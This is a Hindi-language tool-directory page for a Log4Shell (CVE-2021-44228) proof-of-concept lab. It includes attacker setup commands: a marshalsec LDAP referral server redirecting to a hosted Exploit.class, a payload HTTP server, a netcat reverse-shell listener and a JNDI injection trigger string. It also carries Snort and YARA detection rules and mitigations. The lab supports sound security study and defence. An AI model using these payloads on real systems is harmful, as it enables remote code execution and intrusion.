Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4Shell-PoC — **Log4Shell PoC एक उच्च-निष्ठा शोषण वातावरण है जो CVE-2021-44228 भेद्यता को दोहराने के लिए डिज़ाइन किया गया है।** यह JNDI इंजेक्शन, LDAP/RMI रेफरल रीडायरेक्शन, और Log4j 2 लाइब्रेरी के माध्यम से दूरस्थ कोड निष्पादन (RCE) प्रदर्शित करने के लिए एक कंटेनरीकृत सैंडबॉक्स प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/josemariamicoli/log4shell-poc
भेद्यता विश्लेषणशोषणआईडीएस/आईपीएस से बचनावेब एप्लिकेशन शोषणकमांड एंड कंट्रोललर्निंग और शिक्षाघटना प्रतिक्रियापेलोड डेवलपमेंटलैब और अभ्यास
GitHubjosemariamicoli/log4shell-poc

Log4Shell-PoC

रिपॉजिटरी देखें
127 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

**Log4Shell PoC एक उच्च-निष्ठा शोषण वातावरण है जो CVE-2021-44228 भेद्यता को दोहराने के लिए डिज़ाइन किया गया है।** यह JNDI इंजेक्शन, LDAP/RMI रेफरल रीडायरेक्शन, और Log4j 2 लाइब्रेरी के माध्यम से दूरस्थ कोड निष्पादन (RCE) प्रदर्शित करने के लिए एक कंटेनरीकृत सैंडबॉक्स प्रदान करता है।

साझा करें

██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗███████╗██╗ ██╗
██║ ██╔═══██╗██╔════╝ ██║ ██║██╔════╝██║ ██║██╔════╝██║ ██║
██║ ██║ ██║██║ ███╗███████║███████╗███████║█████╗ ██║ ██║
██║ ██║ ██║██║ ██║╚════██║╚════██║██╔══██║██╔══╝ ██║ ██║
███████╗╚██████╔╝╚██████╔╝ ██║███████║██║ ██║███████╗███████╗███████╗ ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝

root@kitploit:~
                         ██████╗  ██████╗  ██████╗
                         ██╔══██╗██╔═══██╗██╔════╝
                         ██████╔╝██║   ██║██║     
                         ██╔═══╝ ██║   ██║██║     
                         ██║     ╚██████╔╝╚██████╔╝
                         ╚═╝      ╚═════╝  ╚═════╝ 

         ⚡ लॉग4शेल (CVE-2021-44228) PoC लैब
          [ अवधारणा प्रमाण और JNDI शोषण ]

Log4Shell PoC एक उच्च-निष्ठा शोषण वातावरण है जिसे CVE-2021-44228 भेद्यता को प्रतिकृति करने के लिए डिज़ाइन किया गया है। यह एक कंटेनरीकृत सैंडबॉक्स प्रदान करता है जो JNDI इंजेक्शन, LDAP/RMI रेफरल पुनर्निर्देशन, और Log4j 2 लाइब्रेरी के माध्यम से दूरस्थ कोड निष्पादन (RCE) का प्रदर्शन करता है।


⚠️ अस्वीकरण

केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए।

पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए इस अवधारणा प्रमाण का उपयोग करना अवैध है। अंतिम उपयोगकर्ता की जिम्मेदारी है कि वह सभी लागू स्थानीय, राज्य, और संघीय कानूनों का पालन करे। लेखक कोई दायित्व नहीं लेते हैं और इस कार्यक्रम के कारण होने वाले किसी भी डेटा हानि, सिस्टम क्षति, कानूनी परिणाम, या दुरुपयोग के लिए जिम्मेदार नहीं हैं। इस सॉफ्टवेयर का उपयोग करके, आप अपने क्षेत्राधिकार की कानूनी सीमाओं के भीतर कार्य करने के लिए सहमत होते हैं।



खंड 2: परियोजना क्षमताएं और संरचना

🚀 PoC क्षमताएं

  • JNDI इंजेक्शन: भेद्य Log4j 2.14.1 प्रवेश बिंदु।
  • LDAP रेफरल सर्वर: Marshalsec के माध्यम से दुर्भावनापूर्ण LDAP पुनर्निर्देशन।
  • दूरस्थ क्लास लोडिंग: संकलित जावा बाइटकोड की HTTP वितरण।
  • बहु-चरण पेलोड: जावा-मूल रिवर्स शेल निष्पादन।
  • चोरी परीक्षण: TrustURLCodebase और FormatMsgNoLookups बाईपास।

🛠 PoC संरचना

🛰 दुर्भावनापूर्ण बुनियादी ढांचा (हमलावर)

हमलावर पक्ष PoC को सुविधाजनक बनाने के लिए तीन अलग-अलग चैनलों से बना है।

  • LDAP पुनर्निर्देशक (पोर्ट 1389): Marshalsec पर आधारित, यह पीड़ित के JNDI अनुरोध को होस्ट किए गए शोषण की ओर निर्देशित करता है।
  • HTTP पेलोड सर्वर (पोर्ट 8888): Exploit.class बाइटकोड को होस्ट करता है जिसे पीड़ित डाउनलोड करके निष्पादित करता है।
  • NC श्रोता (पोर्ट 9001): रिवर्स शेल के लिए अंतिम कॉलबैक गंतव्य।

💻 भेद्य उदाहरण (पीड़ित)

एक Dockerized OpenJDK 8 वातावरण जो एक भेद्य Log4j कार्यान्वयन चलाता है।

  • Log4j v2.14.1: लक्षित लाइब्रेरी संस्करण।
  • VulnerableLog.java: एक सरल जावा एप्लिकेशन जो उपयोगकर्ता इनपुट को स्वच्छता के बिना लॉग करता है।


खंड 3: सेटअप और निष्पादन निर्देश

⚙️ सेटअप और निष्पादन

1. हमलावर सेटअप (आर्क लिनक्स)

टैब 1: LDAP रेफरल सर्वर

root@kitploit:~
docker run --rm -it -p 1389:1389 maven:3.8.6-openjdk-8 /bin/bash -c "
git clone [https://github.com/mbechler/marshalsec.git](https://github.com/mbechler/marshalsec.git) && \
cd marshalsec && \
mvn clean package -DskipTests && \
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer '[http://172.17.0.1:8888/#Exploit](http://172.17.0.1:8888/#Exploit)' 1389"

टैब 2: HTTP पेलोड वितरण

root@kitploit:~
# Start Python server in the directory containing Exploit.class
python3 -m http.server --bind 0.0.0.0 8888

टैब 3: Netcat श्रोता

root@kitploit:~
nc -lvnp 9001

2. पीड़ित निष्पादन

टैब 4: भेद्य कंटेनर लॉन्च करें

root@kitploit:~
docker run --rm -it -v $(pwd):/app -w /app openjdk:8u121-jdk-alpine /bin/sh

कंटेनर के अंदर: PoC ट्रिगर करें

root@kitploit:~
java -Dlog4j2.formatMsgNoLookups=false \
     -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
     -cp ".:log4j-api-2.14.1.jar:log4j-core-2.14.1.jar" \
     VulnerableLog '${jndi:ldap://172.17.0.1:1389/Exploit}'



खंड 4: पहचान और शमन

🔍 पहचान और रक्षात्मक निगरानी

1. नेटवर्क पहचान (Snort/Suricata)

root@kitploit:~
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET EXPLOIT Possible Log4j RCE Attempt (jndi)"; content:"jndi|3a|"; nocase; sid:2034647; rev:1;)

2. लॉग-आधारित पहचान (YARA)

root@kitploit:~
rule Log4Shell_PoC_JNDI {
    meta:
        description = "Detects JNDI lookup strings in logs used in PoC"
        author = "Apex Pro Framework"
    strings:
        $jndi = / \$\{jndi:(ldap|rmi|dns|nis|iiop|corba|lds):/ i
        $obfuscated = /\$\{\$\{[^}]+\}ndi:/ i
    condition:
        any of them
}

🛡 घटना प्रतिक्रिया (IR) मैट्रिक्स

चरणतकनीकक्या अलर्ट ट्रिगर हुआ?MITRE ATT&CK
प्रारंभिक पहुंचसार्वजनिक-सामना करने वाले ऐप का शोषण[ ]T1190
निष्पादनकमांड और स्क्रिप्टिंग इंटरप्रेटर[ ]T1059
कमांड और नियंत्रणएप्लिकेशन लेयर प्रोटोकॉल (LDAP)[ ]T1071.003
डेटा निकासीगैर-एप्लिकेशन लेयर प्रोटोकॉल[ ]T1048

🔒 शमन और सख्तीकरण

  1. अद्यतन करें: Log4j 2.17.1 या उच्चतर में अपडेट करें।
  2. JVM फ्लैग: लुकअप्स को अक्षम करने के लिए -Dlog4j2.formatMsgNoLookups=true सेट करें।
  3. क्लास हटाना: log4j-core JAR से JndiLookup.class को मैन्युअल रूप से हटाएं।

🔸 संलग्नता के नियम

  1. अलगाव: लक्ष्य IP को आंतरिक Docker ब्रिज (172.17.0.0/16) में हार्ड-कोड करें।
  2. नेटवर्किंग: केवल होस्ट-ओनली/आंतरिक VM नेटवर्किंग सुनिश्चित करें।
  3. C2 सुरक्षा: Python या LDAP सर्वर को सार्वजनिक इंटरनेट पर उजागर न करें।
टूल डाउनलोड करें